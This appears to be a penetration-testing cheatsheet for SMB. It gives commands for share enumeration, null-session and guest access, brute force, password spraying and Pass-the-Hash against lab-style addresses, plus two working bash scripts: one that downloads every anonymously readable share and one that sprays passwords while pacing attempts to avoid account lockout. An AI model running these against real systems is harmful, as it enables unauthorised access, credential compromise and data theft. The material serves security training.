SMB

Listing shares without credentials

Several tools list the shares a host exposes. Without credentials (smbclient's -N, or smbmap with no -u) the listing only succeeds when the server accepts anonymous sessions.

smbmap

smbmap -H 10.129.14.128

smbclient

smbclient -N -L //10.129.14.128

Listing shares with credentials

The same tools list shares as a named user, which usually shows more than the anonymous view. smbmap takes the password with -p; smbclient prompts for it unless it is given inline as -U user%password.

smbmap

smbmap -H 10.129.14.128 -u shelled -p '<password>'

smbclient

smbclient -L //10.129.14.128 -U shelled

Connecting to a share

smbclient opens an interactive session on a single share, so the path must name the share (//host/share), not just the host.

smbclient

smbclient //10.129.14.128/<share> -U shelled

Commands inside an smbclient session

A few commands to use at the smb: \> prompt once connected to a share.

List files on share

ls

Go into a Folder

cd <folder>

Create a folder

mkdir <folder>

Download a file

get <file>

Upload a file

put <local_filename> <remote_filename>

Rename a file

rename <remote_filename> <new_remote_filename>

Run a command on your own machine (smbclient's local shell escape; nothing is executed on the server)

!<cmd>

Example

!cat creds.txt

Attacks

Null session

SMB servers can be configured to accept anonymous logins, usually called a `null session`: authentication with an empty username and an empty password. Each of the following tries exactly that:

smbclient

smbclient -N -L //{IP}

smbmap

smbmap -H {IP}

rpcclient

rpcclient -U "" -N {IP}

enum4linux

enum4linux -a {IP}
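The null-session listing above and the smbclient session commands from the previous section, scripted together as an added example (this is not part of the original cheatsheet): the script parses the share table that `smbclient -N -L` prints, tries an anonymous `ls` on every Disk share, and pulls the readable ones down by passing the interactive lcd/recurse/prompt/mget commands through `-c` instead of typing them at the prompt. It assumes smbclient is installed; the `SMBCLIENT` override variable and the `SAMPLE_LISTING` text are assumptions of this example, and the listing is a constructed sample, not captured output.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheatsheet.
# Null-session share sweep: list shares, test anonymous read access on each
# Disk share, and download readable ones with smbclient -c.
# Assumes smbclient is installed; SMBCLIENT can point at a stub for dry runs.
set -u

SMBCLIENT="${SMBCLIENT:-smbclient}"

# Constructed sample of `smbclient -N -L //host` output (assumption, not a capture).
SAMPLE_LISTING='
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        notes           Disk      Team notes
Reconnecting with SMB1 for workgroup listing.
'

# Print the names of Disk shares from an `smbclient -L` listing read on stdin.
# The table starts at the "Sharename  Type  Comment" header and ends at the
# first blank line; IPC$ and printers are skipped. Share names containing
# spaces are not handled (the Type column would shift).
parse_shares() {
    awk '
        /^[[:space:]]*Sharename[[:space:]]+Type/ { in_table = 1; next }
        in_table && NF == 0                       { in_table = 0 }
        in_table && $2 == "Disk"                  { print $1 }
    '
}

# For each Disk share, try an anonymous (-N) directory listing.
# Prints "<share> readable" or "<share> denied", one share per line.
sweep_null_session() {
    local target="$1" share
    "$SMBCLIENT" -N -L "//$target" 2>/dev/null | parse_shares |
    while IFS= read -r share; do
        if "$SMBCLIENT" -N "//$target/$share" -c 'ls' >/dev/null 2>&1; then
            printf '%s readable\n' "$share"
        else
            printf '%s denied\n' "$share"
        fi
    done
}

# Recursively download one readable share into <outdir>. The commands after -c
# are the interactive ones (lcd, recurse, prompt, mget) run non-interactively;
# outdir must not contain spaces or semicolons because smbclient splits on them.
download_share() {
    local target="$1" share="$2" outdir="$3"
    mkdir -p "$outdir"
    "$SMBCLIENT" -N "//$target/$share" -c "lcd $outdir; recurse ON; prompt OFF; mget *"
}

# Usage: ./smb_null_sweep.sh <target> [<loot_dir>]
if [ "$#" -gt 0 ]; then
    sweep_null_session "$1" | while IFS= read -r share state; do
        if [ "$state" = readable ]; then
            download_share "$1" "$share" "${2:-loot}/$share"
        fi
        printf '%s %s\n' "$share" "$state"
    done
fi
```

Only Disk shares are probed: IPC$ answers a null session on most hosts without exposing files, so counting it as "readable" would produce a false positive. Pointing `SMBCLIENT` at a stub function lets the parsing and control flow be checked without a target.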

Guest account

The SMB guest account provides access to selected resources without individual credentials, typically read-only access to public folders such as shared documents or media files. Unlike a null session it is a named logon (user guest, blank password). The account is disabled by default on current Windows versions, so guest access mostly turns up on Samba hosts using map to guest or on deliberately opened systems.

smbclient

smbclient -L //{IP} -U guest

smbmap

smbmap -H {IP} -u guest -p ''

rpcclient

rpcclient -U "guest" -N {IP}

enum4linux

enum4linux -a {IP} -u 'guest' -p ''

Brute force

We can brute-force one user's password with CrackMapExec (CME) by passing a wordlist to -p. CME's conventional form is a bare username with the domain in -d; --local-auth authenticates against the host's local accounts instead of the domain. Check the lockout policy first (crackmapexec smb {IP} --pass-pol): a wordlist against a single account locks it as soon as the threshold is reached.

crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt
crackmapexec smb {IP} -u 'marie@shelled.io' -p /tmp/passwords.txt --local-auth

Password spraying

Password spraying inverts brute force: one likely password is tried against many users, and the next password only after the lockout window has passed, so no single account reaches the lockout threshold. CrackMapExec (CME) takes the user list with -u.

crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!'
crackmapexec smb {IP} -u /tmp/userlist.txt -p 'Company01!' --local-auth
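A lockout-aware driver for the spray above, added here as an example (it is not part of the original cheatsheet and not CME's own code). It runs one password per round across the whole user list, parses the [+] hit lines out of CME's output, and after LOCKOUT_THRESHOLD-1 rounds waits out the observation window measured from the last attempt, which is how the bad-password counter on a Windows account is reset. It assumes crackmapexec is installed and that the threshold and window have been read from the domain policy beforehand (for example with crackmapexec smb {IP} --pass-pol); the CME and SLEEP override variables and the sample output line in the comments are assumptions of this example.

```bash
#!/usr/bin/env bash
# Added example, not from the original cheatsheet: lockout-aware password
# spray around CrackMapExec. One password is tried against the whole user
# list per round; after LOCKOUT_THRESHOLD-1 rounds it waits until the lockout
# window has elapsed since the last attempt, so the bad-attempt counter on
# every account resets before the next batch.
# Assumes crackmapexec is installed; CME and SLEEP can point at stubs for dry runs.
set -u

CME="${CME:-crackmapexec}"
SLEEP="${SLEEP:-sleep}"
LOCKOUT_THRESHOLD="${LOCKOUT_THRESHOLD:-5}"   # bad attempts that lock an account; 0 = no lockout policy
LOCKOUT_WINDOW="${LOCKOUT_WINDOW:-1800}"      # "reset counter after" window in seconds (30 min default)

# Extract successful logons from CME output. A hit line looks like (constructed sample)
#   SMB  10.0.0.5  445  DC01  [+] shelled.io\marie:Company01! (Pwn3d!)
# and is reduced to "marie:Company01!". Passwords containing spaces would be
# cut at the first space.
parse_cme_hits() {
    awk '/\[\+\]/ {
        for (i = 1; i <= NF; i++)
            if ($i ~ /\\.*:/) { sub(/^.*\\/, "", $i); print $i }
    }'
}

# spray <userlist> <passwordlist> <target>: prints hits as "user:password".
spray() {
    local userlist="$1" passlist="$2" target="$3"
    local per_window=$((LOCKOUT_THRESHOLD - 1))
    local tried=0 last_attempt=0 now remaining pass
    while IFS= read -r pass || [ -n "$pass" ]; do
        [ -n "$pass" ] || continue
        if [ "$LOCKOUT_THRESHOLD" -gt 0 ] && [ "$tried" -ge "$per_window" ]; then
            # The counter resets LOCKOUT_WINDOW seconds after the last bad attempt.
            now=$(date +%s)
            remaining=$((last_attempt + LOCKOUT_WINDOW - now))
            if [ "$remaining" -gt 0 ]; then
                "$SLEEP" "$remaining"
            fi
            tried=0
        fi
        "$CME" smb "$target" -u "$userlist" -p "$pass" --continue-on-success 2>/dev/null | parse_cme_hits
        last_attempt=$(date +%s)
        tried=$((tried + 1))
    done < "$passlist"
}

# Usage: ./spray.sh /tmp/userlist.txt /tmp/passwords.txt <IP>
if [ "$#" -eq 3 ]; then
    spray "$1" "$2" "$3"
fi
```

--continue-on-success keeps CME going through the rest of the user list after the first valid logon, so one round finds every user sharing that password. For local accounts add --local-auth to the CME line; local accounts follow the host's own lockout policy, which can differ from the domain's.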

Pass-the-Hash

If we obtain a user's NT hash and cannot crack it, the hash itself can be used to authenticate over SMB, a technique called Pass-the-Hash (PtH). Windows does not store passwords in plaintext; it stores the NT hash, the unsalted MD4 digest of the UTF-16LE password. NTLM authentication only ever proves possession of that hash (the client answers the server's challenge with a keyed function of the hash, never the password itself), which is why the hash is password-equivalent.

In a Pass-the-Hash attack, the attacker extracts the hash of a valid user from a compromised system (for example from the SAM database or LSASS memory) and reuses it directly to authenticate to other systems, without ever learning the plaintext password. CME's -H takes the NT hash, or the LM:NT pair.

crackmapexec smb {IP} -u Administrator -H {HASH}